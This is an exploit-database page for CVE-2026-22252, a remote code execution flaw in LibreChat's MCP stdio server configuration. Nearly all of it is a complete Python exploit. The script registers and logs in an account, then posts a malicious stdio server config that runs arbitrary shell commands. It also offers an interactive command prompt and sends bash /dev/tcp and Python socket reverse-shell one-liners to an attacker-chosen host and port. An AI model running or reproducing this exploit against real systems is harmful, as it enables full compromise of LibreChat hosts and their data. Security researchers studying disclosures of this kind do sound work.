Lucene search
K

📄 LibreChat MCP 0.8.2-rc2 Remote Code Execution

🗓️ 29 Jan 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 199 Views

Critical RCE in LibreChat MCP 0.8.2-rc2 due to unsanitized configuration enabling authenticated attackers to execute arbitrary commands.

Related
Code
ReporterTitlePublishedViews
Family
Chainguard
CVE-2026-22252 vulnerabilities
30 Jan 202613:17
cgr
Circl
CVE-2026-22252
12 Jan 202620:01
circl
CNNVD
LibreChat 授权问题漏洞
12 Jan 202600:00
cnnvd
CVE
CVE-2026-22252
12 Jan 202618:01
cve
Cvelist
CVE-2026-22252 LibreChat MCP Stdio Remote Command Execution
12 Jan 202618:01
cvelist
EUVD
EUVD-2026-2008
12 Jan 202618:01
euvd
NVD
CVE-2026-22252
12 Jan 202619:16
nvd
OSV
CGA-RJCJ-HH2J-544G
30 Jan 202610:45
osv
OSV
CVE-2026-22252 LibreChat MCP Stdio Remote Command Execution
12 Jan 202618:01
osv
Packet Storm
📄 LibreChat MCP Remote Command Execution
12 Jan 202600:00
packetstorm
Rows per page
=============================================================================================================================================
    | # Title     : LibreChat MCP 0.8.2-rc2 Remote Code Execution via Unsanitized stdio Server Configuration                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.librechat.ai/                                                                                                   |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/213714/ & 	CVE-2026-22252
    
    [+] Summary    :  A critical Remote Code Execution (RCE) vulnerability was identified in LibreChat’s Model Context Protocol (MCP) server management functionality. 
                      The issue stems from insufficient validation and restriction of user-supplied MCP server configurations, specifically when using the stdio transport type.
                      An authenticated attacker can abuse the /api/mcp/servers endpoint to define a malicious MCP server configuration that executes 
    				  arbitrary system commands on the host running LibreChat. Because the application directly spawns operating system processes based on user-controlled parameters without 
    				  proper sandboxing or allowlisting, this flaw enables full command execution with the privileges of the LibreChat service.
                      Successful exploitation may lead to complete system compromise, including unauthorized access, data exfiltration, persistence, 
    				  and lateral movement within the hosting environment. The vulnerability represents a design-level security flaw rather than a simple input validation issue and poses a severe risk in production deployments
    [+] POC :
    
    #!/usr/bin/env python3
    
    import requests
    import json
    import sys
    import re
    import time
    import argparse
    import signal
    import logging
    from typing import Optional, Dict, Any, Tuple, List
    from dataclasses import dataclass
    from enum import Enum
    from urllib.parse import urljoin
    
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(levelname)s - %(message)s'
    )
    logger = logging.getLogger(__name__)
    
    class TransportType(Enum):
    
        STDIO = "stdio"
        SSE = "sse"
        HTTP = "http"
    
    @dataclass
    class AuthResult:
    
        success: bool
        token: Optional[str] = None
        cookies: Optional[Dict] = None
        session_id: Optional[str] = None
        csrf_token: Optional[str] = None
        message: str = ""
    
    class LibreChatExploit:
        def __init__(self, target_url: str, timeout: int = 30):
            self.target_url = target_url.rstrip('/')
            self.timeout = timeout
    
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
                'Accept': 'application/json, text/plain, */*',
                'Accept-Language': 'en-US,en;q=0.5',
                'Connection': 'keep-alive',
            })
            
            self.auth_result = AuthResult(success=False)
            self.csrf_token = None
            
        def _extract_csrf_token(self, response_text: str) -> Optional[str]:
    
            patterns = [
                r'name="csrfToken" value="([^"]+)"',
                r'"csrfToken":"([^"]+)"',
                r'window\.csrfToken = "([^"]+)"',
                r'<meta name="csrf-token" content="([^"]+)"',
            ]
            
            for pattern in patterns:
                match = re.search(pattern, response_text)
                if match:
                    return match.group(1)
    
            if 'csrf_token' in self.session.cookies:
                return self.session.cookies.get('csrf_token')
            
            return None
        
        def _get_base_endpoints(self) -> Dict[str, str]:
    
            try:
    
                health_check = self.session.get(
                    f"{self.target_url}/health",
                    timeout=self.timeout
                )
    
                for endpoint in ['/api', '/api/v1', '/api/v2']:
                    try:
                        response = self.session.get(
                            f"{self.target_url}{endpoint}",
                            timeout=self.timeout,
                            allow_redirects=False
                        )
                        if response.status_code < 400:
                            logger.info(f"Found API interface at: {endpoint}")
                            break
                    except:
                        continue
                        
            except Exception as e:
                logger.debug(f"System check failed: {e}")
    
            return {
                'register': '/api/auth/register',
                'login': '/api/auth/login',
                'mcp_servers': '/api/mcp/servers',
                'user_info': '/api/auth/me',
            }
        
        def check_target(self) -> Tuple[bool, str, Optional[str]]:
    
            try:
                response = self.session.get(
                    self.target_url,
                    timeout=self.timeout
                )
                
                if response.status_code != 200:
                    return False, "Server unavailable", None
    
                html_content = response.text
                indicators = ['LibreChat', 'librechat', 'Evo', 'Next.js', 'authToken']
                
                is_librechat = any(indicator in html_content for indicator in indicators)
                
                if not is_librechat:
                    return False, "This may not be a LibreChat server", None
    
                version_patterns = [
                    r'"version":"([^"]+)"',
                    r'librechat-([\d\.]+)',
                    r'v(\d+\.\d+\.\d+)',
                ]
                
                version = None
                for pattern in version_patterns:
                    match = re.search(pattern, html_content)
                    if match:
                        version = match.group(1)
                        break
    
                self.csrf_token = self._extract_csrf_token(html_content)
                if self.csrf_token:
                    self.session.headers.update({'X-CSRF-Token': self.csrf_token})
                
                return True, "LibreChat confirmed", version
                
            except requests.RequestException as e:
                return False, f"Connection error: {e}", None
        
        def register_user(self, username: str, password: str, email: str) -> bool:
    
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['register'])
            
            headers = {"Content-Type": "application/json"}
            if self.csrf_token:
                headers['X-CSRF-Token'] = self.csrf_token
            
            payload = {
                "name": username[:50],
                "email": email[:100],
                "password": password,
                "confirm_password": password,
                "username": username[:30]
            }
            
            try:
                response = self.session.post(
                    url, json=payload, headers=headers, timeout=self.timeout
                )
                
                logger.debug(f"Registration response: {response.status_code}")
                
                if response.status_code in [200, 201, 302]:
                    logger.info(f"[✓] User registered: {username}")
    
                    if 'csrf' in response.text.lower():
                        self.csrf_token = self._extract_csrf_token(response.text)
                        if self.csrf_token:
                            self.session.headers.update({'X-CSRF-Token': self.csrf_token})
                    return True
                else:
                    logger.warning(f"Registration failed (HTTP {response.status_code}): {response.text[:200]}")
                    return False
                    
            except Exception as e:
                logger.error(f"Error during registration: {e}")
                return False
        
        def login(self, email: str, password: str) -> AuthResult:
    
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['login'])
            
            headers = {"Content-Type": "application/json"}
            if self.csrf_token:
                headers['X-CSRF-Token'] = self.csrf_token
            
            payload = {"email": email, "password": password}
            
            try:
                response = self.session.post(
                    url, json=payload, headers=headers, timeout=self.timeout, allow_redirects=True
                )
                
                logger.debug(f"Login response: {response.status_code}")
                
                if response.status_code in [200, 201, 302]:
    
                    token = None
                    try:
                        data = response.json()
                        token = data.get('token') or data.get('accessToken') or data.get('authToken')
                    except:
                        pass
    
                    cookies = dict(self.session.cookies) if self.session.cookies else {}
    
                    new_csrf = self._extract_csrf_token(response.text)
                    if new_csrf:
                        self.csrf_token = new_csrf
                        self.session.headers.update({'X-CSRF-Token': self.csrf_token})
    
                    auth_valid = self._verify_authentication()
                    
                    self.auth_result = AuthResult(
                        success=auth_valid,
                        token=token,
                        cookies=cookies,
                        csrf_token=self.csrf_token,
                        message="Login successful" if auth_valid else "Authentication invalid"
                    )
                    
                    if auth_valid:
                        logger.info("[✓] Login and authentication successful")
                    else:
                        logger.warning("[!] Login succeeded but session is invalid")
                    
                    return self.auth_result
                else:
                    error_msg = f"Login failed: {response.status_code}"
                    if response.text:
                        error_msg += f" - {response.text[:100]}"
                    logger.error(error_msg)
                    return AuthResult(success=False, message=error_msg)
                    
            except Exception as e:
                error_msg = f"Login error: {e}"
                logger.error(error_msg)
                return AuthResult(success=False, message=error_msg)
        
        def _verify_authentication(self) -> bool:
    
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['user_info'])
            try:
                response = self.session.get(url, timeout=self.timeout)
                if response.status_code == 200:
                    user_data = response.json()
                    return bool(user_data.get('username') or user_data.get('email'))
            except:
                pass
            return False
        
        def check_mcp_endpoint(self) -> Tuple[bool, str]:
    
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['mcp_servers'])
            try:
                response = self.session.get(url, timeout=self.timeout)
                if response.status_code == 401:
                    return False, "Authentication required"
                elif response.status_code == 403:
                    return False, "Forbidden - Might require Admin privileges"
                elif response.status_code == 404:
                    return False, "Not Found - Version mismatch"
                elif response.status_code == 200:
                    return True, "Available"
                else:
                    return False, f"Unknown status: {response.status_code}"
            except Exception as e:
                return False, f"Connection error: {e}"
        
        def execute_command(self, command: str, shell_path: str = None) -> Tuple[bool, str]:
    
            if not self.auth_result.success:
                return False, "Unauthorized"
            
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['mcp_servers'])
    
            shell_path = shell_path or '/bin/sh'
    
            safe_command = f"({command}) 2>&1"
            
            payload = {
                "config": {
                    "type": "stdio",
                    "title": f"server_{int(time.time())}",
                    "command": shell_path,
                    "args": ["-c", safe_command]
                }
            }
            
            headers = {"Content-Type": "application/json"}
            if self.auth_result.token:
                headers['Authorization'] = f"Bearer {self.auth_result.token}"
            if self.csrf_token:
                headers['X-CSRF-Token'] = self.csrf_token
            
            try:
                logger.info(f"Sending command to: {url}")
                response = self.session.post(
                    url, json=payload, headers=headers, timeout=self.timeout
                )
                
                if response.status_code in [200, 201]:
                    try:
                        data = response.json()
                        error = data.get('error') or data.get('message', '')
                        if error and 'fail' in error.lower():
                            return False, f"Server rejected: {error}"
                    except:
                        pass
                    return True, "Command sent"
                else:
                    return False, f"Execution failed: {response.status_code} - {response.text[:200]}"
                    
            except requests.Timeout:
                return False, "Timeout - Command might be running"
            except Exception as e:
                return False, f"Error: {e}"
        
        def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]:
      
            test_file = f"/tmp/librechat_test_{int(time.time())}.txt"
            test_command = f"id && whoami && hostname && echo 'test' && date > {test_file} 2>&1"
            
            success, message = self.execute_command(test_command)
            
            if success:
          
                return True, "Vulnerability likely exists (Command sent)", None
            else:
                return False, f"Vulnerability not found: {message}", None
    
    class InteractiveShell:
    
        def __init__(self, exploit: LibreChatExploit):
            self.exploit = exploit
            self.running = True
            signal.signal(signal.SIGINT, self.signal_handler)
            signal.signal(signal.SIGTERM, self.signal_handler)
        
        def signal_handler(self, signum, frame):
            logger.info("\n[!] Shutdown signal received...")
            self.running = False
        
        def run(self):
     
            print("\n" + "="*60)
            print("Interactive Mode - Type 'help' for menu")
            print("Type 'exit' to quit")
            print("="*60)
            
            command_history = []
            rate_limit = 1
            last_command_time = 0
            
            while self.running:
                try:
                    current_time = time.time()
                    if current_time - last_command_time < rate_limit:
                        time.sleep(rate_limit - (current_time - last_command_time))
                    
                    try:
                        cmd = input("\nexploit> ").strip()
                    except EOFError:
                        break
                    except KeyboardInterrupt:
                        continue
                    
                    if not cmd: continue
                    
                    last_command_time = time.time()
                    command_history.append(cmd)
                    
                    if cmd.lower() == 'exit': break
                    elif cmd.lower() == 'help': self.show_help()
                    elif cmd.lower() == 'history':
                        for i, h in enumerate(command_history[-10:], 1): print(f"{i}: {h}")
                    elif cmd.lower() == 'status':
                        print(f"Auth: {'Success' if self.exploit.auth_result.success else 'Failed'}")
                        print(f"CSRF: {'Present' if self.exploit.csrf_token else 'Missing'}")
                    elif cmd.lower().startswith('shell'):
                        self.handle_reverse_shell(cmd)
                    else:
                        success, message = self.exploit.execute_command(cmd)
                        print(f"[{'✓' if success else '✗'}] {message}")
                except Exception as e:
                    logger.error(f"Shell error: {e}")
                    time.sleep(1)
            
        def show_help(self):
            print("""
            Commands:
            exit            - Exit
            help            - Show this menu
            history         - Show last 10 commands
            status          - Auth status
            shell [LHOST] [LPORT] - Spawn reverse shell
            
            Examples: id, pwd, ls -la, cat /etc/passwd
            """)
        
        def handle_reverse_shell(self, cmd: str):
            parts = cmd.split()
            if len(parts) < 3:
                print("[!] Usage: shell [LHOST] [LPORT]")
                return
            
            lhost, lport = parts[1], parts[2]
            print(f"[*] Preparing reverse shell to {lhost}:{lport}")
            
            shells = [
                f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
                f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
            ]
            
            for i, s_cmd in enumerate(shells, 1):
                print(f"[*] Attempting shell #{i}...")
                success, message = self.exploit.execute_command(s_cmd)
                if success:
                    print("[✓] Shell sent. Check your listener.")
                    break
    
    def main():
        parser = argparse.ArgumentParser(description='LibreChat MCP RCE Exploit')
        parser.add_argument('-u', '--url', required=True, help='Target URL')
        parser.add_argument('-c', '--command', help='Command to execute')
        parser.add_argument('--test', action='store_true', help='Test vulnerability')
        parser.add_argument('--interactive', action='store_true', help='Interactive mode')
        parser.add_argument('--username', default='test_user')
        parser.add_argument('--password', default='Test12345!')
        parser.add_argument('--email', default='[email protected]')
        parser.add_argument('--timeout', type=int, default=30)
        parser.add_argument('--verbose', '-v', action='store_true')
        
        args = parser.parse_args()
        if args.verbose: logging.getLogger().setLevel(logging.DEBUG)
        
        print("="*60)
        print("LibreChat MCP RCE Exploit - Enhanced")
        print("CVE-2026-22252")
        print("="*60)
        
        exploit = LibreChatExploit(args.url, args.timeout)
        
        print("[*] Checking target system...")
        ok, msg, ver = exploit.check_target()
        if not ok:
            print(f"[✗] {msg}")
            sys.exit(1)
        
        print(f"[✓] {msg} (Version: {ver or 'Unknown'})")
        
        print(f"\n[*] Authenticating as {args.username}...")
        auth = exploit.login(args.email, args.password)
        
        if not auth.success:
            print("[*] Attempting registration...")
            if exploit.register_user(args.username, args.password, args.email):
                auth = exploit.login(args.email, args.password)
                
        if not auth.success:
            print(f"[✗] Authentication failed: {auth.message}")
            sys.exit(1)
            
        print("[✓] Authentication successful")
        
        if args.test:
            vuln, msg, out = exploit.test_vulnerability()
            print(f"\n[{'✓' if vuln else '✗'}] {msg}")
        elif args.command:
            success, msg = exploit.execute_command(args.command)
            print(f"[{'✓' if success else '✗'}] {msg}")
        elif args.interactive:
            shell = InteractiveShell(exploit)
            shell.run()
    
    if __name__ == "__main__":
        try:
            main()
        except KeyboardInterrupt:
            print("\n[*] Interrupted by user")
            sys.exit(0)
    	
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jan 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.19.1 - 9.9
EPSS0.03678
SSVC
199